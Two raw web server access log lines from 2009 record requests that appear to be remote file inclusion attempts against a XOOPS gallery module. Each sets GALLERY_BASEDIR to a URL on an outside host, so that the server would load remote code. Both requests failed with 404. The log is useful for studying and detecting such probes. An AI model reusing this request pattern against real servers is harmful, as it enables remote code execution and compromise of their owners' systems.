89.234.63.110 - - [22/May/2009:10:01:11 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:01:11 -0700] "GET /logs/access_080709.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
